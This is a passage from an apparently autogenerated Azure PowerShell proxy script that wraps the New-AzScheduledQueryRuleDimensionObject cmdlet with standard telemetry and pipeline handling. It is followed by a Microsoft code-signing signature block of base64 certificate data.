[Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.module]::Instance.Telemetry.Invoke('Create', $MyInvocation, $parameterSet, $PSCmdlet) } else { $internalCalledCmdlets = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets if ($internalCalledCmdlets -eq '') { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets = $MyInvocation.MyCommand.Name } else { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets += ',' + $MyInvocation.MyCommand.Name } [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = 'internal' } $mapping = @{ __AllParameterSets = 'Az.ScheduledQueryRule.custom\New-AzScheduledQueryRuleDimensionObject'; } $cmdInfo = Get-Command -Name $mapping[$parameterSet] [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ProcessCustomAttributesAtRuntime($cmdInfo, $MyInvocation, $parameterSet, $PSCmdlet) if ($null -ne $MyInvocation.MyCommand -and [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PromptedPreviewMessageCmdlets -notcontains $MyInvocation.MyCommand.Name -and [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ContainsPreviewAttribute($cmdInfo, $MyInvocation)){ [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.Runtime.MessageAttributeHelper]::ProcessPreviewMessageAttributesAtRuntime($cmdInfo, $MyInvocation, $parameterSet, $PSCmdlet) [Microsoft.WindowsAzure.Commands.Utilities.Common.AzurePSCmdlet]::PromptedPreviewMessageCmdlets.Enqueue($MyInvocation.MyCommand.Name) } $wrappedCmd = $ExecutionContext.InvokeCommand.GetCommand(($mapping[$parameterSet]), [System.Management.Automation.CommandTypes]::Cmdlet) $scriptCmd = {& $wrappedCmd @PSBoundParameters} $steppablePipeline = $scriptCmd.GetSteppablePipeline($MyInvocation.CommandOrigin) $steppablePipeline.Begin($PSCmdlet) } catch { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext() throw } } process { try { $steppablePipeline.Process($_) } catch { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext() throw } finally { $backupTelemetryId = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId $backupInternalCalledCmdlets = [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext() } } end { try { $steppablePipeline.End() [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = $backupTelemetryId [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::InternalCalledCmdlets = $backupInternalCalledCmdlets if ($preTelemetryId -eq '') { [Microsoft.Azure.PowerShell.Cmdlets.Monitor.ScheduledQueryRule.module]::Instance.Telemetry.Invoke('Send', $MyInvocation, $parameterSet, $PSCmdlet) [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext() } [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::TelemetryId = $preTelemetryId } catch { [Microsoft.WindowsAzure.Commands.Common.MetricHelper]::ClearTelemetryContext() throw } } } # SIG # Begin signature block # MIIoOQYJKoZIhvcNAQcCoIIoKjCCKCYCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCDdj6cNrqC/hfny # ZY8TvdNJVx2AheO3seELbWyTAODZO6CCDYUwggYDMIID66ADAgECAhMzAAADri01 # UchTj1UdAAAAAAOuMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwODU5WhcNMjQxMTE0MTkwODU5WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQD0IPymNjfDEKg+YyE6SjDvJwKW1+pieqTjAY0CnOHZ1Nj5irGjNZPMlQ4HfxXG # yAVCZcEWE4x2sZgam872R1s0+TAelOtbqFmoW4suJHAYoTHhkznNVKpscm5fZ899 # QnReZv5WtWwbD8HAFXbPPStW2JKCqPcZ54Y6wbuWV9bKtKPImqbkMcTejTgEAj82 # 6GQc6/Th66Koka8cUIvz59e/IP04DGrh9wkq2jIFvQ8EDegw1B4KyJTIs76+hmpV # M5SwBZjRs3liOQrierkNVo11WuujB3kBf2CbPoP9MlOyyezqkMIbTRj4OHeKlamd # WaSFhwHLJRIQpfc8sLwOSIBBAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQUhx/vdKmXhwc4WiWXbsf0I53h8T8w # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMTgzNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AGrJYDUS7s8o0yNprGXRXuAnRcHKxSjFmW4wclcUTYsQZkhnbMwthWM6cAYb/h2W # 5GNKtlmj/y/CThe3y/o0EH2h+jwfU/9eJ0fK1ZO/2WD0xi777qU+a7l8KjMPdwjY # 0tk9bYEGEZfYPRHy1AGPQVuZlG4i5ymJDsMrcIcqV8pxzsw/yk/O4y/nlOjHz4oV # APU0br5t9tgD8E08GSDi3I6H57Ftod9w26h0MlQiOr10Xqhr5iPLS7SlQwj8HW37 # ybqsmjQpKhmWul6xiXSNGGm36GarHy4Q1egYlxhlUnk3ZKSr3QtWIo1GGL03hT57 # xzjL25fKiZQX/q+II8nuG5M0Qmjvl6Egltr4hZ3e3FQRzRHfLoNPq3ELpxbWdH8t # Nuj0j/x9Crnfwbki8n57mJKI5JVWRWTSLmbTcDDLkTZlJLg9V1BIJwXGY3i2kR9i # 5HsADL8YlW0gMWVSlKB1eiSlK6LmFi0rVH16dde+j5T/EaQtFz6qngN7d1lvO7uk # 6rtX+MLKG4LDRsQgBTi6sIYiKntMjoYFHMPvI/OMUip5ljtLitVbkFGfagSqmbxK # 7rJMhC8wiTzHanBg1Rrbff1niBbnFbbV4UDmYumjs1FIpFCazk6AADXxoKCo5TsO # zSHqr9gHgGYQC2hMyX9MGLIpowYCURx3L7kUiGbOiMwaMIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGgowghoGAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAOuLTVRyFOPVR0AAAAA # A64wDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEINAS # hU6Z2oJfgjDXoKSWbZn7Ug8by4gQaVc3VC0rjx31MEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEAO6ovVjHwQbvwlQgZyNmFAqM4GPQh2J+9uGR7 # Z3X/WZHl8L6hOTPOfBXo483B55UAUrkH2gLxP7g4HxBpSPHoM7lBblVS77BhvegL # Hr84+4szSI9kI+Bd+z8JjK8uii34Hqm5lefjIAMa5SPN050e5ssE7MZOgbTu62P3 # sCAtk5GWKh7wa/oaPCPL8x2WmBFelB64YKsoAXv5ZY9+bxZ/WVjOEKkAAkrxyoS6 # 0rFyIMcs/Xc7A8YMzQW3McxhCqvSQ3RpL+9bJ2NYHFlCf5MkSh0brYUjsJEny/55 # EZ/u/duH7FdEATV+wJ4dHLgDjw0Aue+gvTb+Ag0zO9uGQ+myqaGCF5QwgheQBgor # BgEEAYI3AwMBMYIXgDCCF3wGCSqGSIb3DQEHAqCCF20wghdpAgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFSBgsqhkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCD3ltb/2BnFhUO6viPihGMlL7YrIANytS6S # Yc1y2HMHPgIGZjK/djhDGBMyMDI0MDUxNjA2NDIxNS4zNTZaMASAAgH0oIHRpIHO # MIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQL # ExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxk # IFRTUyBFU046OTIwMC0wNUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1l # LVN0YW1wIFNlcnZpY2WgghHqMIIHIDCCBQigAwIBAgITMwAAAecujy+TC08b6QAB # AAAB5zANBgkqhkiG9w0BAQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx # MDAeFw0yMzEyMDYxODQ1MTlaFw0yNTAzMDUxODQ1MTlaMIHLMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l # cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046OTIwMC0w # NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Uw # ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDCV58v4IuQ659XPM1DtaWM # v9/HRUC5kdiEF89YBP6/Rn7kjqMkZ5ESemf5Eli4CLtQVSefRpF1j7S5LLKisMWO # GRaLcaVbGTfcmI1vMRJ1tzMwCNIoCq/vy8WH8QdV1B/Ab5sK+Q9yIvzGw47TfXPE # 8RlrauwK/e+nWnwMt060akEZiJJz1Vh1LhSYKaiP9Z23EZmGETCWigkKbcuAnhvh # 3yrMa89uBfaeHQZEHGQqdskM48EBcWSWdpiSSBiAxyhHUkbknl9PPztB/SUxzRZj # UzWHg9bf1mqZ0cIiAWC0EjK7ONhlQfKSRHVLKLNPpl3/+UL4Xjc0Yvdqc88gOLUr # /84T9/xK5r82ulvRp2A8/ar9cG4W7650uKaAxRAmgL4hKgIX5/0aIAsbyqJOa6OI # GSF9a+DfXl1LpQPNKR792scF7tjD5WqwIuifS9YUiHMvRLjjKk0SSCV/mpXC0BoP # kk5asfxrrJbCsJePHSOEblpJzRmzaP6OMXwRcrb7TXFQOsTkKuqkWvvYIPvVzC68 # UM+MskLPld1eqdOOMK7Sbbf2tGSZf3+iOwWQMcWXB9gw5gK3AIYK08WkJJuyzPqf # itgubdRCmYr9CVsNOuW+wHDYGhciJDF2LkrjkFUjUcXSIJd9f2ssYitZ9CurGV74 # BQcfrxjvk1L8jvtN7mulIwIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFM/+4JiAnzY4 # dpEf/Zlrh1K73o9YMB8GA1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8G # A1UdHwRYMFYwVKBSoFCGTmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMv # Y3JsL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBs # BggrBgEFBQcBAQRgMF4wXAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0 # LmNvbS9wa2lvcHMvY2VydHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy # MDIwMTAoMSkuY3J0MAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUH # AwgwDgYDVR0PAQH/BAQDAgeAMA0GCSqGSIb3DQEBCwUAA4ICAQB0ofDbk+llWi1c # C6nsfie5Jtp09o6b6ARCpvtDPq2KFP+hi+UNNP7LGciKuckqXCmBTFIhfBeGSxvk # 6ycokdQr3815pEOaYWTnHvQ0+8hKy86r1F4rfBu4oHB5cTy08T4ohrG/OYG/B/gN # nz0Ol6v7u/qEjz48zXZ6ZlxKGyZwKmKZWaBd2DYEwzKpdLkBxs6A6enWZR0jY+q5 # FdbV45ghGTKgSr5ECAOnLD4njJwfjIq0mRZWwDZQoXtJSaVHSu2lHQL3YHEFikun # bUTJfNfBDLL7Gv+sTmRiDZky5OAxoLG2gaTfuiFbfpmSfPcgl5COUzfMQnzpKfX6 # +FkI0QQNvuPpWsDU8sR+uni2VmDo7rmqJrom4ihgVNdLaMfNUqvBL5ZiSK1zmaEL # BJ9a+YOjE5pmSarW5sGbn7iVkF2W9JQIOH6tGWLFJS5Hs36zahkoHh8iD963LeGj # ZqkFusKaUW72yMj/yxTeGEDOoIr35kwXxr1Uu+zkur2y+FuNY0oZjppzp95AW1le # hP0xaO+oBV1XfvaCur/B5PVAp2xzrosMEUcAwpJpio+VYfIufGj7meXcGQYWA8Um # r8K6Auo+Jlj8IeFS6lSvKhqQpmdBzAMGqPOQKt1Ow3ZXxehK7vAiim3ZiALlM0K5 # 46k0sZrxdZPgpmz7O8w9gHLuyZAQezCCB3EwggVZoAMCAQICEzMAAAAVxedrngKb # SZkAAAAAABUwDQYJKoZIhvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQI # EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv # ZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmlj # YXRlIEF1dGhvcml0eSAyMDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIy # NVowfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcT # B1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UE # AxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEB # AQUAA4ICDwAwggIKAoICAQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXI # yjVX9gF/bErg4r25PhdgM/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjo # YH1qUoNEt6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1y # aa8dq6z2Nr41JmTamDu6GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v # 3byNpOORj7I5LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pG # ve2krnopN6zL64NF50ZuyjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viS # kR4dPf0gz3N9QZpGdc3EXzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYr # bqgSUei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlM # jgK8QmguEOqEUUbi0b1qGFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSL # W6CmgyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AF # emzFER1y7435UsSFF5PAPBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIu # rQIDAQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIE # FgQUKqdS/mTEmr6CkTxGNSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWn # G1M1GelyMFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEW # M2h0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5 # Lmh0bTATBgNVHSUEDDAKBggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBi # AEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV # 9lbLj+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3Js # Lm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAx # MC0wNi0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2 # LTIzLmNydDANBgkqhkiG9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv # 6lwUtj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZn # OlNN3Zi6th542DYunKmCVgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1 # bSNU5HhTdSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4 # rPf5KYnDvBewVIVCs/wMnosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU # 6ZGyqVvfSaN0DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDF # NLB62FD+CljdQDzHVG2dY3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/ # HltEAY5aGZFrDZ+kKNxnGSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdU # CbFpAUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKi # excdFYmNcP7ntdAoGokLjzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTm # dHRbatGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZq # ELQdVTNYs6FwZvKhggNNMIICNQIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJp # Y2EgT3BlcmF0aW9uczEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjkyMDAtMDVF # MC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMK # AQEwBwYFKw4DAhoDFQCzcgTnGasSwe/dru+cPe1NF/vwQ6CBgzCBgKR+MHwxCzAJ # BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k # MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jv # c29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6e+yFzAi # GA8yMDI0MDUxNTIyMTM0M1oYDzIwMjQwNTE2MjIxMzQzWjB0MDoGCisGAQQBhFkK # BAExLDAqMAoCBQDp77IXAgEAMAcCAQACAhGgMAcCAQACAhOEMAoCBQDp8QOXAgEA # MDYGCisGAQQBhFkKBAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAI # AgEAAgMBhqAwDQYJKoZIhvcNAQELBQADggEBAF44a9QWeg+Id3E41o5OjaE8ULcI # 8vkJsSmXGxbc8sOzU9n7UL8M6RXvpAkdZayoysJAjFrjUwJaXba+hM5cgAaRSvoW # u84aQwo6rOwIEY0PZuYcVvHj0tlXVKEg+or8ccIHarYCY6ff/V3LcPNFbZWa8KwD # yq+/nhjNVW7hF95PNLJhWgxK+Lw5738SOaD9mi44E5a4jFa7asoJXMbPvdOKqa5N # dIZLHGoIBVacxjW+qUIwlyys3Q31KOSOjKr26BOnAvKBZBP9xkGvhDu+AY/eUgl0 # MqOCp6+gq1yvArDj/S+94D263+l8WNjPIYI8NCRnrn1eT4CafQCe5vXnhDMxggQN # MIIECQIBATCBkzB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQ # MA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9u # MSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAecu # jy+TC08b6QABAAAB5zANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0G # CyqGSIb3DQEJEAEEMC8GCSqGSIb3DQEJBDEiBCC9XG/qd3Ojs2RrNiAQUURSB00U # GH5w8vf9SHMPdEUqBzCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EIOU2XQ12 # aob9DeDFXM9UFHeEX74Fv0ABvQMG7qC51nOtMIGYMIGApH4wfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTACEzMAAAHnLo8vkwtPG+kAAQAAAecwIgQgAGwI1c5z # snT9VKpcsRCD4yUbFLrv5RCjtdMGM/z1PFswDQYJKoZIhvcNAQELBQAEggIAV0Cr # R4QT3LDA/Qaa8aRHv3c1ZsBVaWpLE7CXhCz/XMTAY4vB2Qhtgxw7z5hEy7f+X07k # 4+UYRZ5jTDh/+3fryc3qBfL7NxZSHoqGUEgo5LrrI4ilE/IAwXwlwjsqkDzCeErM # f37bV1AZczXUvLI2fRn3JelYvgU+ya7wdpCO3DtgL/05TBrnTXWU0tHUSfV/x8uv # pda0RHqDZUgkvGbLHFT7K4qD6posPT8K3nzHo8wVz7f7HWqZoUQcaf1gj5KmAjb2 # mhBbd1ocuhpfWCeVcL9kCCTu3mAFLFiRaDVdMmj8ELl4Dn1g/bW685rUNcNHX420 # twIFRiwfW3EmvkXTc+ul7DGoZkmWJu4xST8hDEhVlDhuUI05F0oKxx2QgliDNSdA # ns8Z/U+vTTkkmh6NDCZdGGWjWvYt+d/YsvN5DlVFQijRUVaH+ydzQhAQ1DnUolZT # RdijyJI0pTyJje9jk8H/3hDb1aqov0pJ57taZatmLQ2u1lg8RpqLGyeZR+OKst5g # 